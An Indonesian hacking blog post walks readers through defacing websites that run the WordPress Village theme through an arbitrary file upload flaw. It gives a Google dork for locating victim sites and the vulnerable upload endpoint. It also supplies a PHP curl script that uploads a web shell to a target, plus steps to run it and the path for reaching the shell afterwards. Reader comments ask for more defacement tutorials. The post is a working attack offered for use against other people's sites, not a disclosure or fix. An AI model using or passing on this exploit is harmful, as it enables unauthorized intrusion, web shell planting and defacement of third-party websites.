Home CMS Wordpress Deface Hacking Keamanan Website Security Tester Simple Deface WordPress Village theme Arbitary File Upload

Tuesday 26 May 2015

Simple Deface WordPress Village theme Arbitary File Upload

xixixihi, Nuenomaru again
yosh ketemu lagi sama saya Nuenomaru Hanya ilusi :p wkwkw
langsung aja ya , gak sah banyak cingcong :p

Bahan-Bahan: 
-XAMPP (Search Di Google Banyak Kok, download sesuaikan spek PC sobat )
-Shell (Bisa dicari di google :3 )
- SourceCode upload
- Dork: inurl:/wp-content/themes/village 
(kembangin sendiri ya Dorknya, gunakan imajinasi mu mblo , maka dunia akan terbuka untuk mu wkwkw)

Langkah-Langkah:


1).Search Di Google Gunakan Dork inurl:/wp-content/themes/village

2).Jika Ketemu Masukan Exploit 
/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php

3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."}


4). Copy Script/SourceCode dibawah. simpan dengan ekstensi php (contoh.php)

<?php

$uploadfile="namashellagan.php";
$ch =
curl_init("http://www.target.co.li/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";


?>

NB: 
- ganti namashellagan.php menjadi nama shell milik anda (cth: kucing.php)
- http://www.target.co.li/ ganti dengan url web target yang ingin anda tusboled :v
- simpan semua script upload dan shell anda di Direktori C:/XAMPP/php
5). Aktifkan XAMPP Klik Start Pada Apache

6). Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7). ketikan:     cd C:/xampp/php
8). ketikan:     php namascriptupload.php
9). Jika Succes Akan : {"success" : true}

 Liat penampakan dibawah:

Jika Berhasil tinggal panggil Shell sobat :p
bukan di BBM  , bukan di Telpon  , apa lagi di SMS 
tapi cukup dengan Mantra Shell Akses 

Mantra Shell Akses: 
target.com/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/namashellanda.php 


Nah kalo udah kaya gambar diatas :v seterah mau sobat aapakan kek webnya :v
saran: hargai karya dan kerja keras webmasternya :) titip file and patch
Sekian Tutorial dari Nuenomaru.
Semoga bermanfaat >.<" , maaf bila ada kekurangan.



Nuenomaru

Nuenomaru just an illusion in Cyber World





Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


Simple Deface WordPress Village theme Arbitary File Upload Simple Deface WordPress Village theme Arbitary File Upload MasterBlog TCA 5.0 stars based on 35 reviews xixixihi, Nuenomaru again yosh ketemu lagi sama saya Nuenomaru Hanya ilusi :p wkwkw langsung aja ya , gak sah banyak cingcong :p Bahan...
Share this with short URL Get Short URLloading short url

Related Posts

Next Post
Previous Post

3 comments

avatar
Balas
Faiz delete 26 March 2017 at 17:01

kalo pakai csrf html name='' trus apaan gan Filedata? tolong dong lampunya eh salah pencerahannya

avatar
Balas
MasterBlog TCA delete 26 March 2017 at 23:00

maksudnya gimana gan ?
akkwak, kurang ngerti saya sama pertanyaannya >..<

#Nuenomaru

avatar
Balas
Unknown delete 15 October 2017 at 15:53

tutorial deface dengan plugin ngentot dong


EmoticonEmoticon

Subscribe to: Post Comments (Atom)